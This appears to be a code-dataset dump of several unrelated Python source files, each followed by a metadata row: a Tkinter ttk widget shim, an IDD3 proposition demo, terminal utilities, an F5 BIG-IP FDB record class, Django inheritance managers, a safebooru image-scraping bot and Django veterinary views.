class Radiobutton(Widget, Tkinter.Radiobutton):
def __init__(self, master=None, cnf={}, **kw):
Widget.__init__(self, master, "ttk::radiobutton", cnf, kw)
class Scrollbar(Widget, Tkinter.Scrollbar):
def __init__(self, master=None, cnf={}, **kw):
Widget.__init__(self, master, "ttk::scrollbar", cnf, kw)
class Separator(Widget):
def __init__(self, master=None, cnf={}, **kw):
Widget.__init__(self, master, "ttk::separator", cnf, kw)
class Treeview(Widget, Tkinter.Listbox):
def __init__(self, master=None, cnf={}, **kw):
Widget.__init__(self, master, 'ttk::treeview', cnf, kw)
def children(self, item, newchildren=None):
"""If newchildren is not specified, returns the list of
children belonging to item.
If newchildren is specified, replaces item's child list
with newchildren. Items in the old child list not present
in the new child list are detached from the tree. None of
the items in newchildren may be an ancestor of item.
"""
return self.tk.call(self._w, "children", item, newchildren)
def column(self, column, **kw):
"""Query or modify the options for the specified column.
If no options are specified, returns a dictionary of
option/value pairs. If a single option is specified,
returns the value of that option. Otherwise, the options
are updated with the specified values. The following
options may be set on each column:
-id name
The column name. This is a read-only option. For example,
[$pathname column #n -id] returns the data column
associated with data column #n.
-anchor
Specifies how the text in this column should be aligned
with respect to the cell. One of n, ne, e, se, s, sw, w,
nw, or center.
-width w
The width of the column in pixels. Default is something
reasonable, probably 200 or so.
"""
pass
def delete(self, items):
"""Deletes each of the items and all of their descendants.
The root item may not be deleted. See also: detach.
"""
return self.tk.call(self._w, "delete", items)
def detach(self, items):
"""Unlinks all of the specified items from the tree. The
items and all of their descendants are still present and
may be reinserted at another point in the tree but will
not be displayed. The root item may not be detached. See
also: delete.
"""
return self.tk.call(self._w, "detach", items)
def exists(self, item):
"""Returns 1 if the specified item is present in the
tree, 0 otherwise.
"""
return self.tk.call(self._w, "exists", item)
def focus(self, item=None):
"""If item is specified, sets the focus item to item.
Otherwise, returns the current focus item, or {} if there
is none.
"""
return self.tk.call(self._w, "focus", item)
def heading(self, column, **kw):
"""Query or modify the heading options for the specified
column. Valid options are:
-text text
The text to display in the column heading.
-image imageName
Specifies an image to display to the right of the column heading.
-command script
A script to evaluate when the heading label is pressed.
"""
pass
def identify(self, x, y):
"""Returns a description of the widget component under the point given
by x and y. The return value is a list with one of the following forms:
heading #n
The column heading for display column #n.
separator #n
The border to the right of display column #n.
cell itemid #n
The data value for item itemid in display column #n.
item itemid element
The tree label for item itemid; element is one of text, image, or
indicator, or another element name depending on the style.
row itemid
The y position is over the item but x does not identify any element
or displayed data value.
nothing
The coordinates are not over any identifiable object.
See COLUMN IDENTIFIERS for a discussion of display columns and data
columns.
"""
pass
def index(self, item):
"""Returns the integer index of item within its parent's list of
children.
"""
pass
def insert(self, parent, index, id=None, **kw):
"""Creates a new item. parent is the item ID of the parent item, or
the empty string {} to create a new top-level item. index is an
integer, or the value end, specifying where in the list of parent's
children to insert the new item. If index is less than or equal to
zero, the new node is inserted at the beginning; if index is greater
than or equal to the current number of children, it is inserted at the
end. If -id is specified, it is used as the item identifier; id must
not already exist in the tree. Otherwise, a new unique identifier is
generated.
returns the item identifier of the newly created item. See ITEM
OPTIONS for the list of available options.
"""
pass
def item(item, **kw):
"""Query or modify the options for the specified item. If no -option
is specified, returns a dictionary of option/value pairs. If a single
-option is specified, returns the value of that option. Otherwise, the
item's options are updated with the specified values. See ITEM OPTIONS
for the list of available options.
"""
pass
def move(self, item, parent, index):
"""Moves item to position index in parent's list of children. It is
illegal to move an item under one of its descendants.
If index is less than or equal to zero, item is moved to the
beginning; if greater than or equal to the number of children, it's
moved to the end.
"""
pass
def next(self, item):
"""Returns the identifier of item's next sibling, or {} if item is the
last child of its parent.
"""
pass
def parent(self, item):
"""Returns the ID of the parent of item, or {} if item is at the top
level of the hierarchy.
"""
pass
def prev(self, item):
"""Returns the identifier of item's previous sibling, or {} if item is
the first child of its parent.
"""
pass
def selection(self):
"""Returns the list of selected items"""
pass
def selection_set(self, items):
"""items becomes the new selection. """
pass
def selection_add(self, items):
"""Add items to the selection """
pass
def selection_remove(self, items):
"""Remove items from the selection """
pass
def selection_toggle(self, items):
"""Toggle the selection state of each item in items. """
pass
def set(self, item, column, value=None):
"""If value is specified, sets the value of column column in item item,
otherwise returns the current value. See COLUMN IDENTIFIERS.
"""
pass
else:
print "GUI: tcl/tk version is older than 8.5; using simple back-up widgets."
# In the future, could add more fake tile widgets (or handle more methods of
# existing ones) if required.
class FakeCombobox(Tkinter.OptionMenu):
def __init__(self, master=None, textvariable=None,values=None,state=None,**kw):
# missing state=readonly
# missing current()
Tkinter.OptionMenu.__init__(self,master,textvariable,*values)
Combobox = FakeCombobox
class FakeProgressbar(Tkinter.Frame):
def __init__(self,master=None,cnf={},**kw):
Tkinter.Frame.__init__(self,master)
def step(self,amount=1.0):
pass
def start(self):
pass
def stop(self):
pass
Progressbar = FakeProgressbar
# CB: tix has Notebook, Combobox, and Meter, but I wouldn't
# want to rely on Tix being present (even though it is
# supposed to be part of Python's standard library).
| bsd-3-clause | 419,085,562,894,774,600 | 34.977368 | 93 | 0.506839 | false | 4.092743 | false | false | false |
andrecunha/idd3 | examine.py | 1 | 2041 | # -*- coding: utf-8 -*-
# IDD3 - Propositional Idea Density from Dependency Trees
# Copyright (C) 2014-2015 Andre Luiz Verucci da Cunha
#
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option)
# any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along with
# this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import print_function, unicode_literals, division
import pprint
import idd3
from idd3 import Relation, Engine
from idd3.rules import en
import nltk
from sys import argv
import logging
logging.basicConfig(level=logging.DEBUG)
try:
from termcolor import colored
except ImportError:
def colored(string, color, attrs):
return string
def demo():
idd3.use_language(en)
graphs = nltk.parse.dependencygraph.DependencyGraph.load(argv[1])
index = int(argv[2]) - 1
engine = Engine(idd3.all_rulesets, idd3.all_transformations)
relations = []
for relation in graphs[index].nodelist:
relations.append(Relation(**relation))
print(colored('Sentence %d:' % (index + 1), 'white', attrs=['bold']))
pprint.pprint(relations)
print(colored('Propositions:', 'white', attrs=['bold']))
engine.analyze(relations)
for i, prop in enumerate(engine.props):
print(str(i + 1) + ' ' + str(prop))
print(colored('Unprocessed relations:', 'white', attrs=['bold']))
for relation in engine.get_unprocessed_relations(relations):
print(relation)
if __name__ == '__main__':
if len(argv) != 3:
print('Usage: python', argv[0], '<conll file>', '<index>')
else:
demo()
| gpl-3.0 | 3,371,991,498,734,300,700 | 30.890625 | 78 | 0.696227 | false | 3.751838 | false | false | false |
JMSwag/jms-utils | jms_utils/terminal.py | 1 | 8327 | # --------------------------------------------------------------------------
# The MIT License (MIT)
#
# Copyright (c) 2014-2016 Digital Sapphire
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# --------------------------------------------------------------------------
from __future__ import print_function
import logging
try:
import msvcrt
except ImportError:
msvcrt = None
import locale
import optparse
import os
import platform
import shlex
import struct
import subprocess
import sys
try:
import termios
except ImportError:
termios = None
try:
import tty
except ImportError:
tty = None
import six
log = logging.getLogger(__name__)
def print_to_console(text):
enc = locale.getdefaultlocale()[1] or "utf-8"
try:
print(text.encode(enc, errors="backslashreplace"))
except (LookupError, UnicodeEncodeError):
# Unknown encoding or encoding problem. Fallback to ascii
print(text.encode("ascii", errors="backslashreplace"))
def terminal_formatter():
max_width = 80
max_help_position = 80
# No need to wrap help messages if we're on a wide console
columns = get_terminal_size()[0]
if columns:
max_width = columns
fmt = optparse.IndentedHelpFormatter(width=max_width,
max_help_position=max_help_position)
return fmt
# get width and height of console
# works on linux, os x, windows, cygwin(windows)
# originally retrieved from:
# http://stackoverflow.com/questions/
# 566746/how-to-get-console-window-width-in-python
def get_terminal_size():
current_os = platform.system()
tuple_xy = None
if current_os == u'Windows':
tuple_xy = _get_terminal_size_windows()
if tuple_xy is None:
tuple_xy = _get_terminal_size_tput()
# needed for window's python in cygwin's xterm!
if current_os in [u'Linux', u'Darwin'] or current_os.startswith('CYGWIN'):
tuple_xy = _get_terminal_size_linux()
if tuple_xy is None:
log.debug(u"default")
tuple_xy = (80, 25) # default value
return tuple_xy
def _get_terminal_size_windows():
try:
from ctypes import windll, create_string_buffer
# stdin handle is -10
# stdout handle is -11
# stderr handle is -12
h = windll.kernel32.GetStdHandle(-12)
csbi = create_string_buffer(22)
res = windll.kernel32.GetConsoleScreenBufferInfo(h, csbi)
if res:
(bufx, bufy, curx, cury, wattr,
left, top, right, bottom,
maxx, maxy) = struct.unpack("hhhhHhhhhhh", csbi.raw)
sizex = right - left + 1
sizey = bottom - top + 1
return sizex, sizey
except:
pass
def _get_terminal_size_tput():
# get terminal width
# http://stackoverflow.com/questions/263890/
# how-do-i-find-the-width-height-of-a-terminal-window
try:
cols = int(subprocess.check_call(shlex.split('tput cols')))
rows = int(subprocess.check_call(shlex.split('tput lines')))
return (cols, rows)
except:
pass
def _get_terminal_size_linux():
def ioctl_GWINSZ(fd):
try:
import fcntl
# Is this required
# import termios
cr = struct.unpack('hh',
fcntl.ioctl(fd, termios.TIOCGWINSZ, '1234'))
return cr
except:
pass
cr = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2)
if not cr:
try:
fd = os.open(os.ctermid(), os.O_RDONLY)
cr = ioctl_GWINSZ(fd)
os.close(fd)
except:
pass
if not cr:
try:
cr = (os.environ['LINES'], os.environ['COLUMNS'])
except:
return None
return int(cr[1]), int(cr[0])
# Gets a single character form standard input. Does not echo to the screen
class GetCh:
def __init__(self):
if sys.platform == u'win32':
self.impl = _GetchWindows()
else:
self.impl = _GetchUnix()
def __call__(self):
return self.impl()
class _GetchUnix:
def __init__(self):
pass
def __call__(self):
pass
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
tty.setraw(sys.stdin.fileno())
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
return ch
class _GetchWindows:
def __init__(self):
pass
def __call__(self):
return msvcrt.getch()
def ask_yes_no(question, default='no', answer=None):
u"""Will ask a question and keeps prompting until
answered.
Args:
question (str): Question to ask end user
default (str): Default answer if user just press enter at prompt
answer (str): Used for testing
Returns:
(bool) Meaning:
True - Answer is yes
False - Answer is no
"""
default = default.lower()
yes = [u'yes', u'ye', u'y']
no = [u'no', u'n']
if default in no:
help_ = u'[N/y]?'
default = False
else:
default = True
help_ = u'[Y/n]?'
while 1:
display = question + '\n' + help_
if answer is None:
log.debug(u'Under None')
answer = six.moves.input(display)
answer = answer.lower()
if answer == u'':
log.debug(u'Under blank')
return default
if answer in yes:
log.debug(u'Must be true')
return True
elif answer in no:
log.debug(u'Must be false')
return False
else:
sys.stdout.write(u'Please answer yes or no only!\n\n')
sys.stdout.flush()
answer = None
six.moves.input(u'Press enter to continue')
sys.stdout.write('\n\n\n\n\n')
sys.stdout.flush()
def get_correct_answer(question, default=None, required=False,
answer=None, is_answer_correct=None):
u"""Ask user a question and confirm answer
Args:
question (str): Question to ask user
default (str): Default answer if no input from user
required (str): Require user to input answer
answer (str): Used for testing
is_answer_correct (str): Used for testing
"""
while 1:
if default is None:
msg = u' - No Default Available'
else:
msg = (u'\n[DEFAULT] -> {}\nPress Enter To '
u'Use Default'.format(default))
prompt = question + msg + u'\n--> '
if answer is None:
answer = six.moves.input(prompt)
if answer == '' and required and default is not None:
print(u'You have to enter a value\n\n')
six.moves.input(u'Press enter to continue')
print(u'\n\n')
answer = None
continue
if answer == u'' and default is not None:
answer = default
_ans = ask_yes_no(u'You entered {}, is this '
u'correct?'.format(answer),
answer=is_answer_correct)
if _ans:
return answer
else:
answer = None
| mit | -2,106,631,287,010,268,000 | 28.217544 | 79 | 0.578119 | false | 3.9976 | false | false | false |
f5devcentral/f5-cccl | f5_cccl/resource/net/fdb/record.py | 1 | 1541 | """Provides a class for managing BIG-IP FDB tunnel record resources."""
# coding=utf-8
#
# Copyright (c) 2017-2021 F5 Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
from f5_cccl.resource import Resource
from f5_cccl.utils.route_domain import normalize_address_with_route_domain
LOGGER = logging.getLogger(__name__)
class Record(Resource):
"""Record class for managing network configuration on BIG-IP."""
properties = dict(name=None, endpoint=None)
def __init__(self, name, default_route_domain, **data):
"""Create a record from CCCL recordType."""
super(Record, self).__init__(name, partition=None)
endpoint = data.get('endpoint', None)
self._data['endpoint'] = normalize_address_with_route_domain(
endpoint, default_route_domain)[0]
def __eq__(self, other):
if not isinstance(other, Record):
return False
return super(Record, self).__eq__(other)
def _uri_path(self, bigip):
raise NotImplementedError
| apache-2.0 | 8,939,869,457,900,549,000 | 32.5 | 74 | 0.69695 | false | 3.992228 | false | false | false |
emilkjer/django-model-utils | model_utils/managers.py | 1 | 8414 | from types import ClassType
import warnings
from django.contrib.contenttypes.models import ContentType
from django.db import models
from django.db.models.fields.related import OneToOneField
from django.db.models.manager import Manager
from django.db.models.query import QuerySet
import django
class InheritanceQuerySet(QuerySet):
def select_subclasses(self, *subclasses):
if not subclasses:
subclasses = [rel.var_name for rel in self.model._meta.get_all_related_objects()
if isinstance(rel.field, OneToOneField)
and issubclass(rel.field.model, self.model)]
new_qs = self.select_related(*subclasses)
new_qs.subclasses = subclasses
return new_qs
def _clone(self, klass=None, setup=False, **kwargs):
for name in ['subclasses', '_annotated']:
if hasattr(self, name):
kwargs[name] = getattr(self, name)
return super(InheritanceQuerySet, self)._clone(klass, setup, **kwargs)
def annotate(self, *args, **kwargs):
qset = super(InheritanceQuerySet, self).annotate(*args, **kwargs)
qset._annotated = [a.default_alias for a in args] + kwargs.keys()
return qset
def get_subclass(self, obj):
"""
FIX see https://bitbucket.org/carljm/django-model-utils/pull-request/5/patch-to-issue-16/diff
and https://bitbucket.org/carljm/django-model-utils/issue/15/mti-problem-with-select_subclasses
"""
def get_attribute(obj, s):
try:
return getattr(obj,s, False)
except obj.__class__.DoesNotExist:
return False
if django.VERSION[0:2] < (1, 5):
sub_obj = [getattr(obj, s) for s in self.subclasses if getattr(obj, s)] or [obj]
else:
sub_obj = [getattr(obj, s) for s in self.subclasses if get_attribute(obj, s)] or [obj]
return sub_obj[0]
def iterator(self):
iter = super(InheritanceQuerySet, self).iterator()
if getattr(self, 'subclasses', False):
for obj in iter:
sub_obj = self.get_subclass(obj)
if getattr(self, '_annotated', False):
for k in self._annotated:
setattr(sub_obj, k, getattr(obj, k))
yield sub_obj
else:
for obj in iter:
yield obj
class InheritanceManager(models.Manager):
use_for_related_fields = True
def get_query_set(self):
return InheritanceQuerySet(self.model)
def select_subclasses(self, *subclasses):
return self.get_query_set().select_subclasses(*subclasses)
def get_subclass(self, *args, **kwargs):
return self.get_query_set().select_subclasses().get(*args, **kwargs)
class InheritanceCastMixin(object):
def cast(self):
results = tuple(self.values_list('pk', 'real_type'))
type_to_pks = {}
for pk, real_type_id in results:
type_to_pks.setdefault(real_type_id, []).append(pk)
content_types = ContentType.objects.in_bulk(type_to_pks.keys())
pk_to_child = {}
for real_type_id, pks in type_to_pks.iteritems():
content_type = content_types[real_type_id]
child_type = content_type.model_class()
children = child_type._default_manager.in_bulk(pks)
for pk, child in children.iteritems():
pk_to_child[pk] = child
children = []
# sort children into same order as parents where returned
for pk, real_type_id in results:
children.append(pk_to_child[pk])
return children
class QueryManager(models.Manager):
def __init__(self, *args, **kwargs):
if args:
self._q = args[0]
else:
self._q = models.Q(**kwargs)
super(QueryManager, self).__init__()
def order_by(self, *args):
self._order_by = args
return self
def get_query_set(self):
qs = super(QueryManager, self).get_query_set().filter(self._q)
if hasattr(self, '_order_by'):
return qs.order_by(*self._order_by)
return qs
class PassThroughManager(models.Manager):
"""
Inherit from this Manager to enable you to call any methods from your
custom QuerySet class from your manager. Simply define your QuerySet
class, and return an instance of it from your manager's `get_query_set`
method.
Alternately, if you don't need any extra methods on your manager that
aren't on your QuerySet, then just pass your QuerySet class to the
``for_queryset_class`` class method.
class PostQuerySet(QuerySet):
def enabled(self):
return self.filter(disabled=False)
class Post(models.Model):
objects = PassThroughManager.for_queryset_class(PostQuerySet)()
"""
# pickling causes recursion errors
_deny_methods = ['__getstate__', '__setstate__', '_db']
def __init__(self, queryset_cls=None):
self._queryset_cls = queryset_cls
super(PassThroughManager, self).__init__()
def __getattr__(self, name):
if name in self._deny_methods:
raise AttributeError(name)
return getattr(self.get_query_set(), name)
def get_query_set(self):
if self._queryset_cls is not None:
kargs = {'model': self.model}
if hasattr(self, '_db'):
kargs['using'] = self._db
return self._queryset_cls(**kargs)
return super(PassThroughManager, self).get_query_set()
@classmethod
def for_queryset_class(cls, queryset_cls):
class _PassThroughManager(cls):
def __init__(self):
return super(_PassThroughManager, self).__init__()
def get_query_set(self):
kwargs = {}
if hasattr(self, "_db"):
kwargs["using"] = self._db
return queryset_cls(self.model, **kwargs)
return _PassThroughManager
def manager_from(*mixins, **kwds):
"""
Returns a Manager instance with extra methods, also available and
chainable on generated querysets.
(By George Sakkis, originally posted at
http://djangosnippets.org/snippets/2117/)
:param mixins: Each ``mixin`` can be either a class or a function. The
generated manager and associated queryset subclasses extend the mixin
classes and include the mixin functions (as methods).
:keyword queryset_cls: The base queryset class to extend from
(``django.db.models.query.QuerySet`` by default).
:keyword manager_cls: The base manager class to extend from
(``django.db.models.manager.Manager`` by default).
"""
warnings.warn(
"manager_from is pending deprecation; use PassThroughManager instead.",
PendingDeprecationWarning,
stacklevel=2)
# collect separately the mixin classes and methods
bases = [kwds.get('queryset_cls', QuerySet)]
methods = {}
for mixin in mixins:
if isinstance(mixin, (ClassType, type)):
bases.append(mixin)
else:
try: methods[mixin.__name__] = mixin
except AttributeError:
raise TypeError('Mixin must be class or function, not %s' %
mixin.__class__)
# create the QuerySet subclass
id = hash(mixins + tuple(kwds.iteritems()))
new_queryset_cls = type('Queryset_%d' % id, tuple(bases), methods)
# create the Manager subclass
bases[0] = manager_cls = kwds.get('manager_cls', Manager)
new_manager_cls = type('Manager_%d' % id, tuple(bases), methods)
# and finally override new manager's get_query_set
super_get_query_set = manager_cls.get_query_set
def get_query_set(self):
# first honor the super manager's get_query_set
qs = super_get_query_set(self)
# and then try to bless the returned queryset by reassigning it to the
# newly created Queryset class, though this may not be feasible
if not issubclass(new_queryset_cls, qs.__class__):
raise TypeError('QuerySet subclass conflict: cannot determine a '
'unique class for queryset instance')
qs.__class__ = new_queryset_cls
return qs
new_manager_cls.get_query_set = get_query_set
return new_manager_cls()
| bsd-3-clause | 8,724,807,216,674,744,000 | 36.395556 | 103 | 0.611719 | false | 4.114425 | false | false | false |
ace3df/ImageTweet | plugins/safebooru.py | 1 | 9578 | # -*- coding: utf-8 -*-
import random
import time
import sys
import os
import re
sys.path.append(
os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))
import utils
def delete_image(image):
import time
time.sleep(10)
os.remove(image)
def tag_clean(tag_html):
text = tag_html.text
text = text.rstrip('1234567890.')
text = text.replace("'", "\'").strip()
return text
def get_image_online(**kwargs):
if kwargs.get('used images'):
txt_name = kwargs.get('used images')
used_links = open(txt_name, 'r').read().splitlines()
else:
txt_name = os.path.join(os.getcwd(), "Used safebooru {0}.txt".format(
kwargs['bot name']))
try:
used_links = open(txt_name, 'r').read().splitlines()
except:
if not os.path.exists(txt_name):
print("Didn't find any used links! Creating a TXT!")
print("Set it to:\n{0}".format(txt_name))
used_links = []
else:
used_links = open(txt_name, 'r').read().splitlines()
if kwargs.get('highest page'):
high_page = int(kwargs.get('highest page'))
else:
high_page = 50
tried_pages = [high_page]
cookie_file = None
try_count = 0
low_page = 0
page = 0
x = None
no_images = False
url_start = "http://safebooru.org"
url_search = "http://safebooru.org/index.php?page=post&s=list&tags="
if utils.is_bool(kwargs.get('login')):
cookie_file = "../safebooru.txt"
url_login = url_start + "/index.php?page=account&s=login&code=00"
form_num = 0
form_user = "user"
form_password = "pass"
username = kwargs.get('username')
password = kwargs.get('password')
if not os.path.exists(cookie_file):
browser, s = utils.scrape_site(url_login, cookie_file, True)
form = browser.get_form(form_num)
form[form_user].value = username
form[form_password].value = password
browser.submit_form(form)
s.cookies.save()
if utils.is_bool(kwargs.get('save images')):
if kwargs.get('path'):
path = kwargs.get('path')
else:
path = os.path.abspath(os.path.join(os.getcwd(),
"images"))
if not os.path.exists(path):
os.makedirs(path)
else:
path = os.path.abspath(os.path.join(os.getcwd()))
if kwargs.get('tags'):
if isinstance(kwargs.get('tags'), list):
tags = '+'.join(kwargs.get('tags'))
else:
tags = '+'.join(kwargs.get('tags').split(', '))
else:
tags = ""
if kwargs.get('ignore tags'):
if isinstance(kwargs.get('ignore tags'), list):
ignore_tags = kwargs.get('ignore tags')
else:
ignore_tags = kwargs.get('ignore tags').split(', ')
else:
ignore_tags = []
if utils.is_bool(kwargs.get('ignore cosplay')):
ignore_cosplay = utils.is_bool(kwargs.get('ignore cosplay'))
else:
ignore_cosplay = False
if utils.is_bool(kwargs.get('accept webm')):
accept_webm = utils.is_bool(kwargs.get('accept webm'))
else:
accept_webm = False
tried_pages = [high_page + 41]
while True:
while True:
while True:
while True:
no_images = False
try_count += 1
if try_count == 15:
return False, False
page = str(int(random.randint(low_page, high_page) * 40))
while int(page) in tried_pages:
if int(page) == 0:
break
if not x:
x = high_page
page = str(int(
random.randint(low_page, high_page) * 1))
if int(page) > int(x):
continue
tried_pages.append(int(page))
x = min(tried_pages)
page_url = "&pid=" + str(page)
url = "%s%s%s" % (url_search, tags, page_url)
browser = utils.scrape_site(url, cookie_file)
if browser.find('h1', text="Nothing found, try google? "):
no_images = True
elif len(browser.find_all('img')) < 3:
no_images = True
time.sleep(1)
if not no_images:
break
elif no_images and int(page) == 0:
return False, False
good_image_links = []
image_links = browser.find_all('span', class_="thumb")
for link in image_links:
try:
link['id']
except:
continue
link = str(link['id'])[1:]
good_image_links.append(link)
if good_image_links == []:
return False, False
random.shuffle(good_image_links)
url = "%s/index.php?page=post&s=view&id=%s" % (
url_start, random.choice(good_image_links))
try_count = 0
while url in used_links:
url = "%s/index.php?page=post&s=view&id=%s" % (
url_start, random.choice(good_image_links))
try_count = try_count + 1
if try_count == 20:
break
used_links.append(url)
post_url = url
browser.open(url)
image_tags = []
char_tags = []
art_tags = []
sers_tags = []
tags_tags = []
site_tag = browser.find('ul', id="tag-sidebar")
site_tag = site_tag.find_all('li')
for taga in site_tag:
tag = tag_clean(taga)
if taga['class'][0] == "tag-type-artist":
art_tags.append(tag.title())
elif taga['class'][0] == "tag-type-copyright":
sers_tags.append(tag.title())
elif taga['class'][0] == "tag-type-character":
char_tags.append(tag.title())
else:
tags_tags.append(tag.title())
image_tags.append(tag.lower())
if any([item in [x.lower() for x in ignore_tags]
for item in [x.lower() for x in image_tags]]):
continue
if ignore_cosplay:
if any(" (cosplay)" in s for s in image_tags):
continue
break
filename = ""
if not utils.is_bool(kwargs.get('message')):
message = ""
try:
url = browser.find(
'img', attrs={'id': 'image'})['src'].replace("\\\\", "\\")
except:
# Flash file
continue
sn_kwgs = {}
sn_url, sn_kwgs = utils.saucenao(url, kwargs['saucenao api'], True)
re_dict = {'{#artist}': (
'#' if art_tags else '') + ' #'.join(
[x.replace(" ", "_") for x in art_tags]),
'{#character}': (
'#' if char_tags else '') + ' #'.join(
[x.replace(" ", "_") for x in char_tags]),
'{#series}': (
'#' if sers_tags else '') + ' #'.join(
[x.replace(" ", "_") for x in sers_tags]),
'{#tags}': (
'#' if tags_tags else '') + ' #'.join(
[x.replace(" ", "_") for x in tags_tags]),
'{artist}': ', '.join(art_tags),
'{character}': ', '.join(char_tags),
'{series}': ', '.join(sers_tags),
'{tags}': ', '.join(tags_tags),
'{url}': post_url,
'{sn title}': sn_kwgs.get('title'),
'{sn illust id}': sn_kwgs.get('illust id'),
'{sn illust url}': sn_url,
'{sn artist}': sn_kwgs.get('artist'),
'{sn artist id}': sn_kwgs.get('artist id'),
'{sn artist url}': sn_kwgs.get('artist url')}
if kwargs.get('filename'):
filename = utils.replace_all(kwargs.get('filename'), re_dict)
filename = utils.safe_msg(filename)
if kwargs.get('message'):
message = utils.replace_all(kwargs.get('message'), re_dict)
message = utils.safe_msg(message)
with open(txt_name, 'w') as f:
f.write("\n".join(used_links))
tweet_image = utils.download_image(url, path, filename, **kwargs)
if tweet_image:
break
if not utils.is_bool(kwargs.get('save images')):
from threading import Thread
Thread(name="Delete Image", target=delete_image, args=(
tweet_image, )).start()
return message, tweet_image
def main(**kwargs):
message, image = get_image_online(**kwargs)
return(message, image)
| mit | 392,481,504,197,402,100 | 37.934959 | 79 | 0.448423 | false | 4.12667 | false | false | false |
davebridges/mousedb | mousedb/veterinary/views.py | 1 | 7047 | '''This module generates the views for the veterinary app.
There is one generic home view for the entire app as well as detail, create update and delete views for these models:
* :class:`~mousedb.veterinary.models.MedicalIssue`
* :class:`~mousedb.veterinary.models.MedicalCondition`
* :class:`~mousedb.veterinary.models.MedicalTreatment`
'''
from django.views.generic.base import TemplateView
from django.views.generic.detail import DetailView
from django.views.generic.edit import CreateView, UpdateView, DeleteView
from django.core.urlresolvers import reverse_lazy
from braces.views import LoginRequiredMixin, PermissionRequiredMixin
from mousedb.veterinary.models import MedicalIssue,MedicalCondition,MedicalTreatment
class VeterinaryHome(LoginRequiredMixin, TemplateView):
'''This view is the main page for the veterinary app.
This view contains links to all medical issues, conditions and treatments.
If this becomes too unwieldy over time, it might be necessary to limit medical_issues to the most recent few.'''
template_name = "veterinary_home.html"
def get_context_data(self, **kwargs):
'''Adds to the context all issues, conditions and treatments.'''
context = super(VeterinaryHome, self).get_context_data(**kwargs)
context['medical_issues'] = MedicalIssue.objects.all()
context['medical_conditions'] = MedicalCondition.objects.all()
context['medical_treatments'] = MedicalTreatment.objects.all()
return context
class MedicalIssueDetail(LoginRequiredMixin, DetailView):
'''This view is for details of a particular :class:`~mousedb.veterinary.MedicalIssue`.
It passes an object **medical_issue** when the url **/veterinary/medical-issue/<pk#>** is requested.'''
model = MedicalIssue
context_object_name = 'medical_issue'
template_name = 'medical_issue_detail.html'
class MedicalIssueCreate(PermissionRequiredMixin, CreateView):
'''This view is for creating a new :class:`~mousedb.veterinary.MedicalIssue`.
It requires the permissions to create a new medical issue and is found at the url **/veterinary/medical-issue/new**.'''
permission_required = 'veterinary.create_medicalissue'
model = MedicalIssue
fields = '__all__'
template_name = 'medical_issue_form.html'
class MedicalIssueUpdate(PermissionRequiredMixin, UpdateView):
'''This view is for updating a :class:`~mousedb.veterinary.MedicalIssue`.
It requires the permissions to update a medical issue and is found at the url **/veterinary/medical-issue/<pk$>/edit**.'''
permission_required = 'veterinary.update_medicalissue'
model = MedicalIssue
fields = '__all__'
context_object_name = 'medical_issue'
template_name = 'medical_issue_form.html'
class MedicalIssueDelete(PermissionRequiredMixin, DeleteView):
'''This view is for deleting a :class:`~mousedb.veterinary.MedicalIssue`.
It requires the permissions to delete a medical issue and is found at the url **/veterinary/medical-issue/<pk$>/delete**.'''
permission_required = 'veterinary.delete_medicalissue'
model = MedicalIssue
template_name = 'confirm_delete.html'
success_url = reverse_lazy('veterinary-home')
class MedicalConditionDetail(LoginRequiredMixin, DetailView):
'''This view is for details of a particular :class:`~mousedb.veterinary.MedicalCondition`.
It passes an object **medical_condition** when the url **/veterinary/medical-condition/<slug>** is requested.'''
model = MedicalCondition
context_object_name = 'medical_condition'
template_name = 'medical_condition_detail.html'
class MedicalConditionCreate(PermissionRequiredMixin, CreateView):
'''This view is for creating a new :class:`~mousedb.veterinary.MedicalCondition`.
It requires the permissions to create a new medical issue and is found at the url **/veterinary/medical-condition/new**.'''
permission_required = 'veterinary.create_medicalcondition'
model = MedicalCondition
fields = '__all__'
template_name = 'medical_condition_form.html'
class MedicalConditionUpdate(PermissionRequiredMixin, UpdateView):
'''This view is for updating a :class:`~mousedb.veterinary.MedicalCondition`.
It requires the permissions to update a medical issue and is found at the url **/veterinary/medical-condition/<slug>/edit**.'''
permission_required = 'veterinary.update_medicalcondition'
model = MedicalCondition
fields = '__all__'
context_object_name = 'medical_condition'
template_name = 'medical_condition_form.html'
class MedicalConditionDelete(PermissionRequiredMixin, DeleteView):
'''This view is for deleting a :class:`~mousedb.veterinary.MedicalCondition`.
